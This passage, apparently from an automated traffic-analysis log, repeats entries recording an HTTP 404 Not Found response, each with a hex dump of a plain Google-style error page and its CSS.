69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 